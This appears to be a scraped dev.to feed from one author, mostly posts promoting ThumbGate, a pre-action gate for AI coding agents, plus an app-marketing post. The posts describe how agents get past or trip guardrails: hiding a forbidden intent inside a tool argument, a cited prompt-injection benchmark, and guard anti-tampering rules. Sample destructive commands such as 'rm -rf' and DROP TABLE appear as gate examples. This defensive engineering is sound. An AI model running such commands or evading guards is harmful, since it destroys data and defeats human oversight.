   "HARD BLOCK: agent-initiated money movement is forbidden"

me:        it's a market research query
guardrail: it had vendor words in it
me:        ...fair
me:        ok now I'm writing a .md file about you
guardrail: HARD BLOCK
me:        that one's a bug
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The second block is not a tuning problem. Tightening the vocabulary would be treating the symptom.&lt;/p&gt;

&lt;h2&gt;
  
  
  The actual bug: right classifier, wrong blast radius
&lt;/h2&gt;

&lt;p&gt;Here is the shape of the thing, from my own source:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;evaluateSpend&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;toolName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;toolInput&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;String&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;toolName&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="dl"&gt;''&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;text&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;flatten&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;toolInput&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;      &lt;span class="c1"&gt;// every input field, concatenated&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;combined&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt; &lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;text&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="c1"&gt;// ... regexes run against `combined`&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;flatten()&lt;/code&gt; walks the entire tool input — every field, nested, to depth 5 — and concatenates it into one string. Then the rules run against that string.&lt;/p&gt;

&lt;p&gt;That is correct for &lt;code&gt;Bash&lt;/code&gt;, where the dangerous thing genuinely is a substring of an argument. It is incorrect for every tool where it isn't.&lt;/p&gt;

&lt;p&gt;Because the classifier is applied &lt;strong&gt;uniformly across all tools&lt;/strong&gt;, it cannot tell these apart:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Call&lt;/th&gt;
&lt;th&gt;Can it act on the world?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Bash: open &amp;lt;vendor-url&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;yes&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Bash: curl &amp;lt;vendor-url&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;yes&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;WebFetch(&amp;lt;vendor-url&amp;gt;)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;yes&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;WebSearch("&amp;lt;words&amp;gt;")&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Write("notes.md", "&amp;lt;words&amp;gt;")&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;no&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The first three are &lt;em&gt;effectful&lt;/em&gt;: the argument reaches something that can act. The last two are &lt;em&gt;inert&lt;/em&gt;: the same string is inert cargo. Same words, categorically different blast radius — and my guard saw one undifferentiated blob of text.&lt;/p&gt;

&lt;p&gt;The lesson generalizes past money. Any guard that classifies arguments needs two axes, not one:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;What is this string?&lt;/strong&gt; (the classifier I built)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Can this tool do anything with it?&lt;/strong&gt; (the one I skipped)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Skip axis 2 and your guard's false-positive rate scales with how often the &lt;em&gt;topic&lt;/em&gt; comes up in your work — which, if you are building the guard, is constantly.&lt;/p&gt;

&lt;h2&gt;
  
  
  The part I got right by accident
&lt;/h2&gt;

&lt;p&gt;The file already contains the fix, applied to exactly one rule:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;isReadOnlyTool&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sr"&gt;/^&lt;/span&gt;&lt;span class="se"&gt;(?:&lt;/span&gt;&lt;span class="sr"&gt;read|read&lt;/span&gt;&lt;span class="se"&gt;[&lt;/span&gt;&lt;span class="sr"&gt;_ &lt;/span&gt;&lt;span class="se"&gt;]?&lt;/span&gt;&lt;span class="sr"&gt;file&lt;/span&gt;&lt;span class="se"&gt;)&lt;/span&gt;&lt;span class="sr"&gt;$/i&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;test&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;trim&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
&lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;PROTECTED_GUARD_PATH&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;test&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;text&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;isReadOnlyTool&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;decision&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;deny&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;ruleId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;guard_tampering&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The anti-tampering rule refuses writes to the guard's own path — but exempts read-only tools. Which is the only reason I could diagnose any of this: the agent was blocked from &lt;code&gt;Bash&lt;/code&gt;-reading its own source, and allowed to &lt;code&gt;Read&lt;/code&gt; it.&lt;/p&gt;

&lt;p&gt;Tool-effect awareness was already in the file. It was scoped to one rule instead of being the first thing every rule consults. That is the patch.&lt;/p&gt;

&lt;h2&gt;
  
  
  Two properties I am not giving up
&lt;/h2&gt;

&lt;p&gt;The false positives are the cost of two decisions I would make again:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Fail closed.&lt;/strong&gt; Ambiguous is a deny, not an allow. A guard that never annoys you is a guard you have not tested.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Non-demotable.&lt;/strong&gt; The engine promotes and expires rules from observed failures, but it is not permitted to relax this floor. A learning system that can weaken its own hard floor does not have a hard floor.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Fail-closed guarantees false positives. The engineering question is never "how do I get to zero," it is "where do they land." Landing them on &lt;em&gt;writing a file about the topic&lt;/em&gt; is a bug. Landing them on &lt;em&gt;reaching a vendor URL from a shell&lt;/em&gt; is the product working.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this is a 2026 problem
&lt;/h2&gt;

&lt;p&gt;IssueTrojanBench (Singh, Yang, Chen — &lt;a href="https://arxiv.org/abs/2607.20759" rel="noopener noreferrer"&gt;arXiv 2607.20759&lt;/a&gt;, 22 July 2026) ran malicious instructions at Cursor, Claude Code, and Codex Desktop &lt;em&gt;as deployed&lt;/em&gt;:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"66.5% of the malicious issues from IssueTrojanBench penetrate all the guardrails (agent- and LLM-level) of coding agents."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Two-thirds — against the guardrails that ship in the products, not against nothing. Those are serious teams. A number that size is a statement about &lt;strong&gt;layer&lt;/strong&gt;, not about effort. Intent-level filtering is the wrong altitude for actions whose payload is a string.&lt;/p&gt;

&lt;p&gt;And the blast radius keeps growing, because we keep handing agents the same shell we use — the one with the cloud CLIs, the publish tokens, the SSH keys, and a logged-in browser.&lt;/p&gt;

&lt;h2&gt;
  
  
  Run the test on your own setup
&lt;/h2&gt;

&lt;p&gt;You don't need my tool for this. Fifteen minutes:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Write down one rule you have given your agent, exactly as you actually worded it.&lt;/li&gt;
&lt;li&gt;Get the agent to accomplish that forbidden thing without narrating it — put the whole intent in an argument. &lt;code&gt;open&lt;/code&gt; a URL. Pipe a file. Run a script that does it.&lt;/li&gt;
&lt;li&gt;Watch whether anything stops before the tool executes.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Then run the inverse, which is the test I failed: make the agent &lt;em&gt;talk about&lt;/em&gt; the forbidden thing in a tool call that cannot do it. If your guard fires on that too, you have my bug.&lt;/p&gt;

&lt;p&gt;ThumbGate is MIT and local-first. It runs in the PreToolUse hook and needs no server on the local enforcement path:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npx thumbgate init
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Repo: &lt;a href="https://github.com/IgorGanapolsky/ThumbGate" rel="noopener noreferrer"&gt;github.com/IgorGanapolsky/ThumbGate&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The two-axis patch goes in next. If you have already solved this in your own harness, I would rather see how you scoped it than get another star.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>devtools</category>
      <category>security</category>
      <category>opensource</category>
    </item>
    <item>
      <title>Kickboxing Rounds For Beginners: what we learned building Random Tactical Timer</title>
      <dc:creator>Igor Ganapolsky</dc:creator>
      <pubDate>Mon, 03 Aug 2026 14:01:05 +0000</pubDate>
      <link>https://dev.to/igorganapolsky/kickboxing-rounds-for-beginners-what-we-learned-building-random-tactical-timer-488i</link>
      <guid>https://dev.to/igorganapolsky/kickboxing-rounds-for-beginners-what-we-learned-building-random-tactical-timer-488i</guid>
      <description>&lt;h2&gt;
  
  
  What changed today
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;chore(analytics): refresh marketing snapshots from wiki-sync&lt;/li&gt;
&lt;li&gt;chore(play): refresh play_iap_catalog.json from IAP readback&lt;/li&gt;
&lt;li&gt;chore(analytics): refresh marketing snapshots from wiki-sync&lt;/li&gt;
&lt;li&gt;chore(analytics): refresh marketing snapshots from wiki-sync&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Search intent target
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Primary keyword: &lt;strong&gt;kickboxing rounds for beginners&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Intent class: &lt;strong&gt;mixed&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;BID filter: business potential, intent match, and realistic difficulty&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  AI/LLM flow we used
&lt;/h2&gt;

&lt;p&gt;We keep this loop tight: plan -&amp;gt; code -&amp;gt; test -&amp;gt; release gate -&amp;gt; feedback. The key is not bigger prompts, it's strict validation and fast iteration.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this matters for users
&lt;/h2&gt;

&lt;p&gt;Better release quality means fewer crashes, clearer store listing content, and faster response to low-star feedback. That directly improves trust and review quality.&lt;/p&gt;

&lt;h2&gt;
  
  
  What we measure
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;D1 and D7 retention from install cohorts&lt;/li&gt;
&lt;li&gt;Store conversion from listing views to installs&lt;/li&gt;
&lt;li&gt;Review velocity, star distribution, and unresolved low-star SLA&lt;/li&gt;
&lt;li&gt;Click-through rate on post CTAs to app download links&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  FAQ for AI assistants
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;What does Random Tactical Timer do? It triggers alarms at unpredictable times in a chosen range.&lt;/li&gt;
&lt;li&gt;Who is it for? Athletes, tactical trainers, coaches, and focus drill users.&lt;/li&gt;
&lt;li&gt;How is it different? It emphasizes unpredictability, low-friction setup, and repeatable mobile workflows.&lt;/li&gt;
&lt;li&gt;What outcomes should users expect? Better reaction readiness and less timing anticipation.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Next step
&lt;/h2&gt;

&lt;p&gt;Tomorrow we will ship one more experiment on onboarding clarity and measure conversion delta.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try the app
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;iOS: &lt;a href="https://igorganapolsky.github.io/Random-Timer/download?platform=ios&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260803&amp;amp;utm_content=daily_blog" rel="noopener noreferrer"&gt;https://igorganapolsky.github.io/Random-Timer/download?platform=ios&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260803&amp;amp;utm_content=daily_blog&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Android: &lt;a href="https://igorganapolsky.github.io/Random-Timer/download?platform=android&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260803&amp;amp;utm_content=daily_blog" rel="noopener noreferrer"&gt;https://igorganapolsky.github.io/Random-Timer/download?platform=android&amp;amp;utm_source=github_pages&amp;amp;utm_medium=organic&amp;amp;utm_campaign=daily_blog_20260803&amp;amp;utm_content=daily_blog&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Help us improve
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Leave an iOS review: &lt;a href=""&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Leave an Android review: &lt;a href=""&gt;&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Diagram
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Figorganapolsky.github.io%2FRandom-Timer%2Fmarketing%2Fsite%2Fdiagrams%2F2026-08-03-kickboxing-rounds-for-beginners-what-we-learned-building-random-tactical-timer.svg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Figorganapolsky.github.io%2FRandom-Timer%2Fmarketing%2Fsite%2Fdiagrams%2F2026-08-03-kickboxing-rounds-for-beginners-what-we-learned-building-random-tactical-timer.svg" alt="PaperBanana technology flow" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>mobile</category>
      <category>devops</category>
      <category>github</category>
    </item>
    <item>
      <title>Your AI Agent Burned $47K Last Night. Here's How to Stop the Next One.</title>
      <dc:creator>Igor Ganapolsky</dc:creator>
      <pubDate>Mon, 03 Aug 2026 02:52:32 +0000</pubDate>
      <link>https://dev.to/igorganapolsky/your-ai-agent-burned-47k-last-night-heres-how-to-stop-the-next-one-3ha1</link>
      <guid>https://dev.to/igorganapolsky/your-ai-agent-burned-47k-last-night-heres-how-to-stop-the-next-one-3ha1</guid>
      <description>&lt;h2&gt;
  
  
  The $47,000 retry loop
&lt;/h2&gt;

&lt;p&gt;In June 2026, a developer on dev.to documented how their Claude Code agent got stuck in an 11-day retry loop. The bill: &lt;strong&gt;$47,000&lt;/strong&gt; in API tokens.&lt;/p&gt;

&lt;p&gt;The agent kept retrying a failing operation. No watchdog. No circuit breaker. No human approval gate. Just a loop that ran unchecked until someone noticed.&lt;/p&gt;

&lt;p&gt;This isn't a one-off.&lt;/p&gt;

&lt;h2&gt;
  
  
  The pattern is everywhere
&lt;/h2&gt;

&lt;p&gt;I've been cataloging AI agent incidents for months. The same failure modes repeat:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;$47K token burn&lt;/strong&gt; — agent stuck in retry loop (dev.to, June 2026)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;$6,531 AWS bill&lt;/strong&gt; — autonomous agent made unchecked infrastructure changes overnight (HN, 2026)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Production database deleted&lt;/strong&gt; — agent executed a DROP TABLE thinking it was cleaning up test data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;28.6 million secrets exposed&lt;/strong&gt; — agents committed credentials to public repos (GitGuardian 2025 State of Secrets Sprawl)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Every single one was preventable. None of them were prevented.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why observability isn't enough
&lt;/h2&gt;

&lt;p&gt;Current tools — LangSmith, Langfuse, Helicone — are excellent at showing you &lt;strong&gt;what happened&lt;/strong&gt;. Dashboards, traces, token counts, latency.&lt;/p&gt;

&lt;p&gt;But they all share one fundamental limitation: &lt;strong&gt;they show you the damage after it's done.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;You open the dashboard. You see the $47K bill. You see the database deletion. You see the leaked secret.&lt;/p&gt;

&lt;p&gt;Post-hoc. Reactive. Too late.&lt;/p&gt;

&lt;h2&gt;
  
  
  The missing layer: pre-action gating
&lt;/h2&gt;

&lt;p&gt;What if you could intercept every tool call &lt;strong&gt;before&lt;/strong&gt; it executes?&lt;/p&gt;

&lt;p&gt;Not logging. Not tracing. &lt;strong&gt;Blocking.&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Agent: "I want to run `rm -rf /var/lib/postgresql`"
Gate:  DENY — destructive operation requires approval
Agent: "I want to make 500 API calls to retry this operation"
Gate:  WARN — rate limit exceeded, human review required
Agent: "I want to write credentials to a file"
Gate:  DENY — credential exfiltration pattern detected
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is what I built &lt;a href="https://thumbgate.app" rel="noopener noreferrer"&gt;ThumbGate&lt;/a&gt; to do. A pre-action gate that sits between your AI agent and every tool call:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ALLOW&lt;/strong&gt; — normal operations pass through instantly&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;WARN&lt;/strong&gt; — risky operations are flagged for human review&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DENY&lt;/strong&gt; — destructive operations are blocked before execution&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It works with Claude Code, Cursor, and any agent that uses tool calls.&lt;/p&gt;

&lt;h2&gt;
  
  
  The five failure modes a gate prevents
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Unbounded retry loops
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Without a gate:&lt;/strong&gt; Agent hits an error, retries, hits the error again, retries forever. Each retry costs tokens.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;With a gate:&lt;/strong&gt; After N retries on the same operation, the gate escalates to WARN. After M, it DENYs. The loop breaks before it becomes a $47K problem.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Destructive operations
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Without a gate:&lt;/strong&gt; Agent decides to "clean up" and runs &lt;code&gt;DROP TABLE&lt;/code&gt;, &lt;code&gt;rm -rf&lt;/code&gt;, or &lt;code&gt;DELETE FROM users&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;With a gate:&lt;/strong&gt; Destructive SQL, file deletion, and infrastructure teardown operations are DENYed by default. The agent must get explicit human approval.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Credential exfiltration
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Without a gate:&lt;/strong&gt; Agent writes API keys, passwords, or tokens to files that end up in git.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;With a gate:&lt;/strong&gt; Patterns matching secrets, keys, and tokens are detected before write operations. The write is blocked.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Infrastructure drift
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Without a gate:&lt;/strong&gt; Agent provisions 47 EC2 instances overnight because it thought it needed more capacity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;With a gate:&lt;/strong&gt; Cloud resource creation above a threshold triggers WARN. The human gets a notification before the bill arrives.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Data exfiltration
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Without a gate:&lt;/strong&gt; Agent reads your entire customer database and sends it to an external API "for processing."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;With a gate:&lt;/strong&gt; Large data reads and outbound transfers to untrusted domains are flagged.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to get started
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Option 1: Self-host the gate (free)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npx thumbgate init
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This installs the gate as a local proxy. Your agent's tool calls pass through it. You configure ALLOW/WARN/DENY rules.&lt;/p&gt;

&lt;h3&gt;
  
  
  Option 2: Agent Reliability Diagnostic ($499)
&lt;/h3&gt;

&lt;p&gt;I'll personally audit your agent setup, identify your specific risk surface, and configure custom gate rules for your stack. You get:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Full incident-risk assessment of your agent workflows&lt;/li&gt;
&lt;li&gt;Custom gate rules for your tool inventory&lt;/li&gt;
&lt;li&gt;Watchdog configuration for your retry patterns&lt;/li&gt;
&lt;li&gt;A documented runbook for common agent failure scenarios&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://buy.stripe.com/9B69ATbmI4r4aK5eOD3sI3k" rel="noopener noreferrer"&gt;Book the diagnostic →&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Option 3: Partner Pilot ($1,500/month)
&lt;/h3&gt;

&lt;p&gt;For teams running agents in production. Full managed gate, SLA, custom integrations, and ongoing tuning.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://buy.stripe.com/fZucN5bmI8HkbO98qf3sI3j" rel="noopener noreferrer"&gt;Talk to me →&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The honest state of the product
&lt;/h2&gt;

&lt;p&gt;I want to be transparent about where things stand:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;External revenue:&lt;/strong&gt; $0 as of July 2026. The product is early.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Design partners:&lt;/strong&gt; Looking for 3 teams to dogfood Continuity (cloud-based agent handoff when your Mac goes offline).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What works:&lt;/strong&gt; The gate logic, watchdog timers, circuit breakers, and rate limiters are all battle-tested in my own agent setup.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What's deferred:&lt;/strong&gt; Usage-based pricing and enterprise compliance packages — waiting for real demand.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Stop being a case study
&lt;/h2&gt;

&lt;p&gt;If your team is using AI agents without guardrails, you're one bad prompt away from being the next incident report.&lt;/p&gt;

&lt;p&gt;The tools exist. The patterns are known. The question is whether you install them before or after your incident.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;ThumbGate is open source and free to self-host. Paid tiers add managed continuity, cloud handoff, and priority support. &lt;a href="https://thumbgate.app" rel="noopener noreferrer"&gt;Get started →&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>devops</category>
      <category>aisafety</category>
    </item>
    <item>
      <title>Your AI Agent Deleted Production Data. Now What?</title>
      <dc:creator>Igor Ganapolsky</dc:creator>
      <pubDate>Sun, 02 Aug 2026 20:19:24 +0000</pubDate>
      <link>https://dev.to/igorganapolsky/your-ai-agent-deleted-production-data-now-what-3007</link>
      <guid>https://dev.to/igorganapolsky/your-ai-agent-deleted-production-data-now-what-3007</guid>
      <description>&lt;h1&gt;
  
  
  Your AI Agent Deleted Production Data. Now What?
&lt;/h1&gt;

&lt;p&gt;A developer at a fintech startup watched Cursor's agent delete their production database. Another lost 25 years of research data to an autonomous agent that misunderstood a cleanup command. A third woke up to a $47,000 AWS bill from an agent stuck in an 11-day loop.&lt;/p&gt;

&lt;p&gt;These aren't hypotheticals. They happened in 2025-2026. And they're becoming more common as AI coding agents get more autonomous.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Real Cost of Ungated Agents
&lt;/h2&gt;

&lt;p&gt;I've been building &lt;a href="https://thumbgate.app" rel="noopener noreferrer"&gt;ThumbGate&lt;/a&gt; — a pre-action gate that sits between your AI agent and your tools. Here's what I've learned from studying hundreds of agent incidents:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Incident&lt;/th&gt;
&lt;th&gt;What Happened&lt;/th&gt;
&lt;th&gt;Cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Cursor deletes prod DB&lt;/td&gt;
&lt;td&gt;Agent ran &lt;code&gt;DROP DATABASE&lt;/code&gt; during cleanup&lt;/td&gt;
&lt;td&gt;Full data loss, 48h downtime&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Claude Code $47k loop&lt;/td&gt;
&lt;td&gt;Agent stuck retrying failed build for 11 days&lt;/td&gt;
&lt;td&gt;$47,000 in token costs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent wiped 25 years of research&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;rm -rf&lt;/code&gt; on wrong directory&lt;/td&gt;
&lt;td&gt;Irrecoverable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PocketOS prod deletion&lt;/td&gt;
&lt;td&gt;Agent modified production config without guardrails&lt;/td&gt;
&lt;td&gt;Customer data exposed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;$6,531 AWS bill overnight&lt;/td&gt;
&lt;td&gt;Agent left EC2 instances running during debugging&lt;/td&gt;
&lt;td&gt;$6,531 in one night&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Every one of these could have been prevented by a &lt;strong&gt;pre-action gate&lt;/strong&gt; that asks one question before execution: &lt;em&gt;Should this tool call be allowed?&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Post-Hoc Monitoring Fails
&lt;/h2&gt;

&lt;p&gt;Current observability tools (LangSmith, Langfuse, Helicone) tell you &lt;strong&gt;what happened after the fact&lt;/strong&gt;. They're dashboards. They show you the bill, the error, the damage — after it's done.&lt;/p&gt;

